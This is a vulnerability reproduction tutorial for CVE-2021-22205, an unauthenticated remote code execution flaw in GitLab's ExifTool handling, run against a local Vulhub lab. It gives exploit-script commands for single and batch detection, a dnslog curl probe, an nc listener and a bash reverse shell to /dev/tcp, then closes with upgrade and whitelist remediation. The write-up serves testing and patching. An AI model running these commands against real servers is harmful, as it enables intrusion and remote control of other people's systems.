CVE-2021-22205 GitLab unauthorized RCE
Vulnerability background and description
On April 15, 2021, GitLab officially released a security patch update to fix the GitLab command execution vulnerability (CVE-2021-22205). Because the ExifTool in GitLab does not correctly handle the extension of the incoming image file, the attacker can execute arbitrary commands on the target server by uploading a specially crafted malicious image, and it is found that the vulnerability is caused by the presence of an unauthorized endpoint in GitLab Can be exploited without authentication, both Community Edition (CE) and Enterprise Edition (EE) are affected, with a CVSS score of 9.9.
The version affected by the vulnerability
- 11.9 <= Gitlab CE/EE < 13.8.8
- 13.9 <= Gitlab CE/EE < 13.9.6
- 13.10 <= Gitlab CE/EE < 13.10.3
Vulnerability recurrence
This reproduction adopts the Vulhub shooting range environment, and a Vulhub shooting range needs to be built locally
Enter the shooting range environment and start the environment with the following command:
docker-compose up -d
Check if the environment port is open
docker-compose ps
Access the URL of the target:http://192.168.0.109:8080
Download the exploit script:https://github.com/Al1ex/CVE-2021-22205
vulnerability detection
python3 CVE-2021-22205.py -v true -t http://192.168.0.109:8080/
Batch detection
python3 CVE-2021-22205.py -s true -f target.txt
exploit
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command
dnslog probe
Website address:http://www.dnslog.cn/
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "curl p77j19.dnslog.cn"
rebound shell
If the target goes out of the network, you can try to reverse the shell
The unit starts monitoring
nc -lvp 4444
#先将反弹shell的命令写⼊tmp⽬录下的1.sh⽂件
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "echo 'bash -i >& /dev/tcp/192.168.0.109/4444 0>&1' > /tmp/1.sh"
#执⾏该⽂件
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "bash /tmp/1.sh"
This machine receives the listening session
Vulnerability Prevention and Remediation
official upgrade
Currently, a new version has been officially released to fix this vulnerability. Affected users are requested to upgrade to the latest version as soon as possible for protection. The official download link:https://about.gitlab.com/update/
Temporary protective measures
If relevant users cannot perform the upgrade operation temporarily, you can use the whitelist to restrict access to the web port.
Related:https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/